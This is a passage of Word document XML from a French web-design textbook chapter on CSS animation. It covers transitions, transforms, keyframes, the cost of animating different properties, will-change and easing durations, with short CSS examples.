              <w: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Concevoir des animations utiles, jamais décoratives à l'excès.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Diagnostiquer une animation saccadée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>16.1 Trois mécanismes distincts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>transition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interpole entre deux états lorsqu'une propriété change. Une </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>transformation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déplace, tourne ou redimensionne sans modifier le flux. Une </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>animation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suit des étapes définies par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@keyframes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, éventuellement en boucle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.52 — Trois façons de produire du mouvement</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174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Mécanisme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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Déclencheur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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Durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>transition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2472"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Changement d'état</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Survol, focus, ouverture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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transform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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Propriété appliquée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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Instantanée ou animée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Déplacement, échelle, rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@keyframes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2472"/>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Application de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>animation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contrôlée image par image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chargement, attention, boucle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux transitions sobres et utiles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.bouton {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  transition: background-color .18s ease, transform .18s ease;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.bouton:hover { background: #274b6d; }</w:t>
        <w:br/>
        <w:t>.bouton:active { transform: translateY(1px); }</w:t>
        <w:br/>
        <w:br/>
        <w:t>.carte:hover { transform: translateY(-2px); box-shadow: 0 12px 28px rgb(15 46</w:t>
        <w:br/>
        <w:t xml:space="preserve">  76 / 14%); }</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COMPOSITEUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Partie du navigateur qui assemble les couches visuelles. Les propriétés </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>transform</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>opacity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> y sont traitées sans recalcul de mise en page, ce qui les rend fluides.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>16.2 Ce qu'il faut animer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Toutes les propriétés ne se valent pas. Animer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> force le navigateur à recalculer la mise en page à chaque image : l'animation saccade sur les machines modestes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.53 — Coût des propriétés animées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62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Propriété</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>transform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible (compositeur)</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À privilégier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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opacity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Faible (compositeur)</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À privilégier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyen</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Avec parcimonie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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background-color</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Moyen (peinture)</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Acceptable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>height</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé (mise en page)</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Éviter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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top</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>left</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Élevé</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Remplacer par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>transform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>box-shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé (peinture)</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Limiter aux petits éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Déplacer un panneau sans recalculer la page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À éviter : anime la mise en page */</w:t>
        <w:br/>
        <w:t>.panneau { transition: height .3s; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* À privilégier : transform et opacity */</w:t>
        <w:br/>
        <w:t>.panneau {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  transform: translateY(-100%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  transition: transform .3s cubic-bezier(.2, .8, .2, 1);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.panneau.ouvert { transform: translateY(0); }</w:t>
      </w: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`WILL-CHANGE`, À UTILISER AVEC PARCIMONIE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>will-change: transform</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> prévient le navigateur qu'une propriété va changer et lui permet de préparer une couche. Appliqué à tous les éléments, il consomme de la mémoire et dégrade les performances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>16.3 Courbes et durées</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La durée et la courbe d'accélération donnent le caractère du mouvement. Trop lent, il paraît lourd ; trop rapide, il devient imperceptible. Les interfaces réactives se situent entre 150 et 300 millisecondes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2413000"/>
            <wp:docPr id="25" name="Picture 25"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f23.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2413000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.23 — Deux courbes, deux sensations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
